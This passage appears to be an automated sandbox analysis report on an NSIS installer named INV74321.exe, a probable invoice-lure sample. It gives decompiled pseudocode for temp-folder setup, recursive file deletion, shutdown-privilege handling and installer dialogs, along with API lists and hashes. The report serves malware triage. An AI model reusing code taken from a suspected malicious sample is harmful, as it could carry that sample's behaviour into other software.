                                                          										if(_t113 != 0) {
                                                          											goto L33;
                                                          										}
                                                          										GetTempPathA(0x3fc, _t157);
                                                          										lstrcatA(_t157, "Low");
                                                          										SetEnvironmentVariableA("TEMP", _t157);
                                                          										SetEnvironmentVariableA("TMP", _t157);
                                                          										_t118 = E00403317(_t174);
                                                          										_t175 = _t118;
                                                          										if(_t118 == 0) {
                                                          											goto L43;
                                                          										}
                                                          										goto L33;
                                                          									}
                                                          									goto L25;
                                                          								}
                                                          								_t141 = _t55[4];
                                                          								__eflags = _t141 - 0x20;
                                                          								if(_t141 == 0x20) {
                                                          									L23:
                                                          									_t15 = _t164 + 0x20;
                                                          									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
                                                          									__eflags =  *_t15;
                                                          									goto L24;
                                                          								}
                                                          								__eflags = _t141;
                                                          								if(_t141 != 0) {
                                                          									goto L24;
                                                          								}
                                                          								goto L23;
                                                          							}
                                                          							_t142 = _t55[1];
                                                          							__eflags = _t142 - 0x20;
                                                          							if(_t142 == 0x20) {
                                                          								L19:
                                                          								 *0x42f4e0 = 1;
                                                          								goto L20;
                                                          							}
                                                          							__eflags = _t142;
                                                          							if(_t142 != 0) {
                                                          								goto L20;
                                                          							}
                                                          							goto L19;
                                                          						}
                                                          					} else {
                                                          						goto L12;
                                                          					}
                                                          					do {
                                                          						L12:
                                                          						_t55 =  &(_t55[1]);
                                                          						__eflags =  *_t55 - 0x20;
                                                          					} while ( *_t55 == 0x20);
                                                          					goto L13;
                                                          				}
                                                          				goto L30;
                                                          			}

































                                                          0x0040361d
                                                          0x0040361f
                                                          0x00403627
                                                          0x00403699
                                                          0x0040369b
                                                          0x004036a2
                                                          0x004036aa
                                                          0x004036aa
                                                          0x004036b5
                                                          0x004036ba
                                                          0x004036c9
                                                          0x004036cd
                                                          0x004036ce
                                                          0x004036d7
                                                          0x004036d0
                                                          0x004036d0
                                                          0x004036d0
                                                          0x004036dd
                                                          0x004036e3
                                                          0x004036e9
                                                          0x004036f1
                                                          0x004036f1
                                                          0x004036ff
                                                          0x00403704
                                                          0x00403716
                                                          0x0040371e
                                                          0x00403724
                                                          0x00403730
                                                          0x00403736
                                                          0x00403740
                                                          0x00403756
                                                          0x00403767
                                                          0x0040376d
                                                          0x00403774
                                                          0x00403777
                                                          0x0040377d
                                                          0x0040377d
                                                          0x00403774
                                                          0x00403781
                                                          0x00403787
                                                          0x00403787
                                                          0x0040378c
                                                          0x0040378c
                                                          0x00000000
                                                          0x004036c9
                                                          0x00403629
                                                          0x0040362b
                                                          0x00403636
                                                          0x00000000
                                                          0x00000000
                                                          0x0040363e
                                                          0x00403649
                                                          0x0040364e
                                                          0x00000000
                                                          0x0040364e
                                                          0x00403612
                                                          0x00403614
                                                          0x00403618
                                                          0x0040361b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040361b
                                                          0x00000000
                                                          0x00403614
                                                          0x00403564
                                                          0x00403570
                                                          0x00403575
                                                          0x0040357a
                                                          0x0040357c
                                                          0x00000000
                                                          0x00000000
                                                          0x00403584
                                                          0x0040358c
                                                          0x0040359d
                                                          0x004035a5
                                                          0x004035a7
                                                          0x004035ac
                                                          0x004035ae
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004035ae
                                                          0x00000000
                                                          0x00403513
                                                          0x004034d4
                                                          0x004034d7
                                                          0x004034da
                                                          0x004034e0
                                                          0x004034e0
                                                          0x004034e0
                                                          0x004034e0
                                                          0x00000000
                                                          0x004034e0
                                                          0x004034dc
                                                          0x004034de
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004034de
                                                          0x0040348f
                                                          0x00403492
                                                          0x00403495
                                                          0x0040349b
                                                          0x0040349b
                                                          0x00000000
                                                          0x0040349b
                                                          0x00403497
                                                          0x00403499
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403499
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040346a
                                                          0x0040346a
                                                          0x0040346a
                                                          0x0040346b
                                                          0x0040346b
                                                          0x00000000
                                                          0x0040346a
                                                          0x00000000

                                                          APIs
                                                          • SetErrorMode.KERNELBASE ref: 0040336D
                                                          • GetVersion.KERNEL32 ref: 00403373
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                          • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                          • OleInitialize.OLE32(00000000), ref: 004033E9
                                                          • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                          • GetCommandLineA.KERNEL32(accumulate Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\INV74321.exe" ,00000020,"C:\Users\user\Desktop\INV74321.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                          • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                            • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                            • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                            • Part of subcall function 0040390A: GetUserDefaultUILanguage.KERNELBASE(00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV74321.exe" ,00000000), ref: 00403924
                                                            • Part of subcall function 0040390A: lstrlenA.KERNEL32(GHFGHFGHFDGDFGDFg,?,?,?,GHFGHFGHFDGDFGDFg,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,74B5FA90), ref: 004039FA
                                                            • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe,GHFGHFGHFDGDFGDFg,?,?,?,GHFGHFGHFDGDFGDFg,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
                                                            • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(GHFGHFGHFDGDFGDFg), ref: 00403A18
                                                            • Part of subcall function 0040390A: LoadImageA.USER32 ref: 00403A61
                                                            • Part of subcall function 0040390A: RegisterClassA.USER32 ref: 00403A9E
                                                            • Part of subcall function 00403830: CloseHandle.KERNEL32(000002C0,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                          • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                          • ExitProcess.KERNEL32 ref: 00403688
                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                          • ExitProcess.KERNEL32 ref: 0040382A
                                                            • Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
                                                          • String ID: "$"C:\Users\user\Desktop\INV74321.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\INV74321.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$accumulate Setup$~nsu
                                                          • API String ID: 1314998376-3653219216
                                                          • Opcode ID: 92f4727230b5494df4ae19d242d75775fcc962e9ce705fe20936cac325b27094
                                                          • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                          • Opcode Fuzzy Hash: 92f4727230b5494df4ae19d242d75775fcc962e9ce705fe20936cac325b27094
                                                          • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E004058BF(void* __eflags, signed int _a4, signed int _a8) {
                                                          				signed int _v8;
                                                          				void* _v12;
                                                          				signed int _v16;
                                                          				struct _WIN32_FIND_DATAA _v336;
                                                          				signed int _t40;
                                                          				char* _t53;
                                                          				signed int _t55;
                                                          				signed int _t58;
                                                          				signed int _t64;
                                                          				signed int _t66;
                                                          				void* _t68;
                                                          				signed char _t69;
                                                          				CHAR* _t71;
                                                          				void* _t72;
                                                          				CHAR* _t73;
                                                          				char* _t76;
                                                          
                                                          				_t69 = _a8;
                                                          				_t73 = _a4;
                                                          				_v8 = _t69 & 0x00000004;
                                                          				_t40 = E00405B7D(__eflags, _t73);
                                                          				_v16 = _t40;
                                                          				if((_t69 & 0x00000008) != 0) {
                                                          					_t66 = DeleteFileA(_t73); // executed
                                                          					asm("sbb eax, eax");
                                                          					_t68 =  ~_t66 + 1;
                                                          					 *0x42f4c8 =  *0x42f4c8 + _t68;
                                                          					return _t68;
                                                          				}
                                                          				_a4 = _t69;
                                                          				_t8 =  &_a4;
                                                          				 *_t8 = _a4 & 0x00000001;
                                                          				__eflags =  *_t8;
                                                          				if( *_t8 == 0) {
                                                          					L5:
                                                          					E004060F7(0x42b898, _t73);
                                                          					__eflags = _a4;
                                                          					if(_a4 == 0) {
                                                          						E00405AD6(_t73);
                                                          					} else {
                                                          						lstrcatA(0x42b898, "\*.*");
                                                          					}
                                                          					__eflags =  *_t73;
                                                          					if( *_t73 != 0) {
                                                          						L10:
                                                          						lstrcatA(_t73, 0x40a014);
                                                          						L11:
                                                          						_t71 =  &(_t73[lstrlenA(_t73)]);
                                                          						_t40 = FindFirstFileA(0x42b898,  &_v336);
                                                          						__eflags = _t40 - 0xffffffff;
                                                          						_v12 = _t40;
                                                          						if(_t40 == 0xffffffff) {
                                                          							L29:
                                                          							__eflags = _a4;
                                                          							if(_a4 != 0) {
                                                          								_t32 = _t71 - 1;
                                                          								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                          								__eflags =  *_t32;
                                                          							}
                                                          							goto L31;
                                                          						} else {
                                                          							goto L12;
                                                          						}
                                                          						do {
                                                          							L12:
                                                          							_t76 =  &(_v336.cFileName);
                                                          							_t53 = E00405ABA( &(_v336.cFileName), 0x3f);
                                                          							__eflags =  *_t53;
                                                          							if( *_t53 != 0) {
                                                          								__eflags = _v336.cAlternateFileName;
                                                          								if(_v336.cAlternateFileName != 0) {
                                                          									_t76 =  &(_v336.cAlternateFileName);
                                                          								}
                                                          							}
                                                          							__eflags =  *_t76 - 0x2e;
                                                          							if( *_t76 != 0x2e) {
                                                          								L19:
                                                          								E004060F7(_t71, _t76);
                                                          								__eflags = _v336.dwFileAttributes & 0x00000010;
                                                          								if(__eflags == 0) {
                                                          									_t55 = E00405877(__eflags, _t73, _v8);
                                                          									__eflags = _t55;
                                                          									if(_t55 != 0) {
                                                          										E0040521E(0xfffffff2, _t73);
                                                          									} else {
                                                          										__eflags = _v8 - _t55;
                                                          										if(_v8 == _t55) {
                                                          											 *0x42f4c8 =  *0x42f4c8 + 1;
                                                          										} else {
                                                          											E0040521E(0xfffffff1, _t73);
                                                          											E00405ED6(_t72, _t73, 0);
                                                          										}
                                                          									}
                                                          								} else {
                                                          									__eflags = (_a8 & 0x00000003) - 3;
                                                          									if(__eflags == 0) {
                                                          										E004058BF(__eflags, _t73, _a8);
                                                          									}
                                                          								}
                                                          								goto L27;
                                                          							}
                                                          							_t64 =  *((intOrPtr*)(_t76 + 1));
                                                          							__eflags = _t64;
                                                          							if(_t64 == 0) {
                                                          								goto L27;
                                                          							}
                                                          							__eflags = _t64 - 0x2e;
                                                          							if(_t64 != 0x2e) {
                                                          								goto L19;
                                                          							}
                                                          							__eflags =  *((char*)(_t76 + 2));
                                                          							if( *((char*)(_t76 + 2)) == 0) {
                                                          								goto L27;
                                                          							}
                                                          							goto L19;
                                                          							L27:
                                                          							_t58 = FindNextFileA(_v12,  &_v336);
                                                          							__eflags = _t58;
                                                          						} while (_t58 != 0);
                                                          						_t40 = FindClose(_v12);
                                                          						goto L29;
                                                          					}
                                                          					__eflags =  *0x42b898 - 0x5c;
                                                          					if( *0x42b898 != 0x5c) {
                                                          						goto L11;
                                                          					}
                                                          					goto L10;
                                                          				} else {
                                                          					__eflags = _t40;
                                                          					if(_t40 == 0) {
                                                          						L31:
                                                          						__eflags = _a4;
                                                          						if(_a4 == 0) {
                                                          							L39:
                                                          							return _t40;
                                                          						}
                                                          						__eflags = _v16;
                                                          						if(_v16 != 0) {
                                                          							_t40 = E0040646B(_t73);
                                                          							__eflags = _t40;
                                                          							if(_t40 == 0) {
                                                          								goto L39;
                                                          							}
                                                          							E00405A8F(_t73);
                                                          							_t40 = E00405877(__eflags, _t73, _v8 | 0x00000001);
                                                          							__eflags = _t40;
                                                          							if(_t40 != 0) {
                                                          								return E0040521E(0xffffffe5, _t73);
                                                          							}
                                                          							__eflags = _v8;
                                                          							if(_v8 == 0) {
                                                          								goto L33;
                                                          							}
                                                          							E0040521E(0xfffffff1, _t73);
                                                          							return E00405ED6(_t72, _t73, 0);
                                                          						}
                                                          						L33:
                                                          						 *0x42f4c8 =  *0x42f4c8 + 1;
                                                          						return _t40;
                                                          					}
                                                          					__eflags = _t69 & 0x00000002;
                                                          					if((_t69 & 0x00000002) == 0) {
                                                          						goto L31;
                                                          					}
                                                          					goto L5;
                                                          				}
                                                          			}




















                                                          APIs
                                                          • DeleteFileA.KERNELBASE(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                          • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                          • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                          • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                          • FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                          • FindClose.KERNEL32(00000000), ref: 00405A26
                                                          Strings
                                                          • "C:\Users\user\Desktop\INV74321.exe" , xrefs: 004058BF
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                                                          • \*.*, xrefs: 0040592A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\Desktop\INV74321.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                          • API String ID: 2035342205-1228882293
                                                          • Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                          • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                          • Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                          • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040646B(CHAR* _a4) {
                                                          				void* _t2;
                                                          
                                                          				_t2 = FindFirstFileA(_a4, 0x42c0e0); // executed
                                                          				if(_t2 == 0xffffffff) {
                                                          					return 0;
                                                          				}
                                                          				FindClose(_t2);
                                                          				return 0x42c0e0;
                                                          			}





                                                          APIs
                                                          • FindFirstFileA.KERNELBASE(74B5FA90,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74B5FA90,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                          • FindClose.KERNEL32(00000000), ref: 00406482
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                          • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                          • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                          • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 84%
                                                          			E00403CA7(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                          				struct HWND__* _v32;
                                                          				void* _v84;
                                                          				void* _v88;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t35;
                                                          				signed int _t37;
                                                          				signed int _t39;
                                                          				struct HWND__* _t49;
                                                          				signed int _t68;
                                                          				struct HWND__* _t74;
                                                          				signed int _t87;
                                                          				struct HWND__* _t92;
                                                          				signed int _t100;
                                                          				int _t104;
                                                          				signed int _t116;
                                                          				signed int _t117;
                                                          				int _t118;
                                                          				signed int _t123;
                                                          				struct HWND__* _t126;
                                                          				struct HWND__* _t127;
                                                          				int _t128;
                                                          				long _t131;
                                                          				int _t133;
                                                          				int _t134;
                                                          				void* _t135;
                                                          				void* _t143;
                                                          
                                                          				_t116 = _a8;
                                                          				if(_t116 == 0x110 || _t116 == 0x408) {
                                                          					_t35 = _a12;
                                                          					_t126 = _a4;
                                                          					__eflags = _t116 - 0x110;
                                                          					 *0x42a878 = _t35;
                                                          					if(_t116 == 0x110) {
                                                          						 *0x42f428 = _t126;
                                                          						 *0x42a88c = GetDlgItem(_t126, 1);
                                                          						_t92 = GetDlgItem(_t126, 2);
                                                          						_push(0xffffffff);
                                                          						_push(0x1c);
                                                          						 *0x429858 = _t92;
                                                          						E0040417B(_t126);
                                                          						SetClassLongA(_t126, 0xfffffff2,  *0x42ec08); // executed
                                                          						 *0x42ebec = E0040140B(4);
                                                          						_t35 = 1;
                                                          						__eflags = 1;
                                                          						 *0x42a878 = 1;
                                                          					}
                                                          					_t123 =  *0x40a1dc; // 0xffffffff
                                                          					_t134 = 0;
                                                          					_t131 = (_t123 << 6) +  *0x42f460;
                                                          					__eflags = _t123;
                                                          					if(_t123 < 0) {
                                                          						L34:
                                                          						E004041C7(0x40b);
                                                          						while(1) {
                                                          							_t37 =  *0x42a878;
                                                          							 *0x40a1dc =  *0x40a1dc + _t37;
                                                          							_t131 = _t131 + (_t37 << 6);
                                                          							_t39 =  *0x40a1dc; // 0xffffffff
                                                          							__eflags = _t39 -  *0x42f464;
                                                          							if(_t39 ==  *0x42f464) {
                                                          								E0040140B(1);
                                                          							}
                                                          							__eflags =  *0x42ebec - _t134; // 0x0
                                                          							if(__eflags != 0) {
                                                          								break;
                                                          							}
                                                          							__eflags =  *0x40a1dc -  *0x42f464; // 0xffffffff
                                                          							if(__eflags >= 0) {
                                                          								break;
                                                          							}
                                                          							_t117 =  *(_t131 + 0x14);
                                                          							E0040618A(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
                                                          							_push( *((intOrPtr*)(_t131 + 0x20)));
                                                          							_push(0xfffffc19);
                                                          							E0040417B(_t126);
                                                          							_push( *((intOrPtr*)(_t131 + 0x1c)));
                                                          							_push(0xfffffc1b);
                                                          							E0040417B(_t126);
                                                          							_push( *((intOrPtr*)(_t131 + 0x28)));
                                                          							_push(0xfffffc1a);
                                                          							E0040417B(_t126);
                                                          							_t49 = GetDlgItem(_t126, 3);
                                                          							__eflags =  *0x42f4cc - _t134;
                                                          							_v32 = _t49;
                                                          							if( *0x42f4cc != _t134) {
                                                          								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                          								__eflags = _t117;
                                                          							}
                                                          							ShowWindow(_t49, _t117 & 0x00000008);
                                                          							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
                                                          							E0040419D(_t117 & 0x00000002);
                                                          							_t118 = _t117 & 0x00000004;
                                                          							EnableWindow( *0x429858, _t118);
                                                          							__eflags = _t118 - _t134;
                                                          							if(_t118 == _t134) {
                                                          								_push(1);
                                                          							} else {
                                                          								_push(_t134);
                                                          							}
                                                          							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
                                                          							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
                                                          							__eflags =  *0x42f4cc - _t134;
                                                          							if( *0x42f4cc == _t134) {
                                                          								_push( *0x42a88c);
                                                          							} else {
                                                          								SendMessageA(_t126, 0x401, 2, _t134);
                                                          								_push( *0x429858);
                                                          							}
                                                          							E004041B0();
                                                          							E004060F7(0x42a890, E00403C88());
                                                          							E0040618A(0x42a890, _t126, _t131,  &(0x42a890[lstrlenA(0x42a890)]),  *((intOrPtr*)(_t131 + 0x18)));
                                                          							SetWindowTextA(_t126, 0x42a890);
                                                          							_push(_t134);
                                                          							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
                                                          							__eflags = _t68;
                                                          							if(_t68 != 0) {
                                                          								continue;
                                                          							} else {
                                                          								__eflags =  *_t131 - _t134;
                                                          								if( *_t131 == _t134) {
                                                          									continue;
                                                          								}
                                                          								__eflags =  *(_t131 + 4) - 5;
                                                          								if( *(_t131 + 4) != 5) {
                                                          									DestroyWindow( *0x42ebf8);
                                                          									 *0x42a068 = _t131;
                                                          									__eflags =  *_t131 - _t134;
                                                          									if( *_t131 <= _t134) {
                                                          										goto L58;
                                                          									}
                                                          									_t74 = CreateDialogParamA( *0x42f420,  *_t131 +  *0x42ec00 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131);
                                                          									__eflags = _t74 - _t134;
                                                          									 *0x42ebf8 = _t74;
                                                          									if(_t74 == _t134) {
                                                          										goto L58;
                                                          									}
                                                          									_push( *((intOrPtr*)(_t131 + 0x2c)));
                                                          									_push(6);
                                                          									E0040417B(_t74);
                                                          									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
                                                          									ScreenToClient(_t126, _t135 + 0x10);
                                                          									SetWindowPos( *0x42ebf8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
                                                          									_push(_t134);
                                                          									E00401389( *((intOrPtr*)(_t131 + 0xc)));
                                                          									__eflags =  *0x42ebec - _t134; // 0x0
                                                          									if(__eflags != 0) {
                                                          										goto L61;
                                                          									}
                                                          									ShowWindow( *0x42ebf8, 8);
                                                          									E004041C7(0x405);
                                                          									goto L58;
                                                          								}
                                                          								__eflags =  *0x42f4cc - _t134;
                                                          								if( *0x42f4cc != _t134) {
                                                          									goto L61;
                                                          								}
                                                          								__eflags =  *0x42f4c0 - _t134;
                                                          								if( *0x42f4c0 != _t134) {
                                                          									continue;
                                                          								}
                                                          								goto L61;
                                                          							}
                                                          						}
                                                          						DestroyWindow( *0x42ebf8);
                                                          						 *0x42f428 = _t134;
                                                          						EndDialog(_t126,  *0x429c60);
                                                          						goto L58;
                                                          					} else {
                                                          						__eflags = _t35 - 1;
                                                          						if(_t35 != 1) {
                                                          							L33:
                                                          							__eflags =  *_t131 - _t134;
                                                          							if( *_t131 == _t134) {
                                                          								goto L61;
                                                          							}
                                                          							goto L34;
                                                          						}
                                                          						_push(0);
                                                          						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
                                                          						__eflags = _t87;
                                                          						if(_t87 == 0) {
                                                          							goto L33;
                                                          						}
                                                          						SendMessageA( *0x42ebf8, 0x40f, 0, 1);
                                                          						__eflags =  *0x42ebec - _t134; // 0x0
                                                          						return 0 | __eflags == 0x00000000;
                                                          					}
                                                          				} else {
                                                          					_t126 = _a4;
                                                          					_t134 = 0;
                                                          					if(_t116 == 0x47) {
                                                          						SetWindowPos( *0x42a870, _t126, 0, 0, 0, 0, 0x13);
                                                          					}
                                                          					if(_t116 == 5) {
                                                          						asm("sbb eax, eax");
                                                          						ShowWindow( *0x42a870,  ~(_a12 - 1) & _t116);
                                                          					}
                                                          					if(_t116 != 0x40d) {
                                                          						__eflags = _t116 - 0x11;
                                                          						if(_t116 != 0x11) {
                                                          							__eflags = _t116 - 0x111;
                                                          							if(_t116 != 0x111) {
                                                          								L26:
                                                          								return E004041E2(_t116, _a12, _a16);
                                                          							}
                                                          							_t133 = _a12 & 0x0000ffff;
                                                          							_t127 = GetDlgItem(_t126, _t133);
                                                          							__eflags = _t127 - _t134;
                                                          							if(_t127 == _t134) {
                                                          								L13:
                                                          								__eflags = _t133 - 1;
                                                          								if(_t133 != 1) {
                                                          									__eflags = _t133 - 3;
                                                          									if(_t133 != 3) {
                                                          										_t128 = 2;
                                                          										__eflags = _t133 - _t128;
                                                          										if(_t133 != _t128) {
                                                          											L25:
                                                          											SendMessageA( *0x42ebf8, 0x111, _a12, _a16);
                                                          											goto L26;
                                                          										}
                                                          										__eflags =  *0x42f4cc - _t134;
                                                          										if( *0x42f4cc == _t134) {
                                                          											_t100 = E0040140B(3);
                                                          											__eflags = _t100;
                                                          											if(_t100 != 0) {
                                                          												goto L26;
                                                          											}
                                                          											 *0x429c60 = 1;
                                                          											L21:
                                                          											_push(0x78);
                                                          											L22:
                                                          											E00404154();
                                                          											goto L26;
                                                          										}
                                                          										E0040140B(_t128);
                                                          										 *0x429c60 = _t128;
                                                          										goto L21;
                                                          									}
                                                          									__eflags =  *0x40a1dc - _t134; // 0xffffffff
                                                          									if(__eflags <= 0) {
                                                          										goto L25;
                                                          									}
                                                          									_push(0xffffffff);
                                                          									goto L22;
                                                          								}
                                                          								_push(_t133);
                                                          								goto L22;
                                                          							}
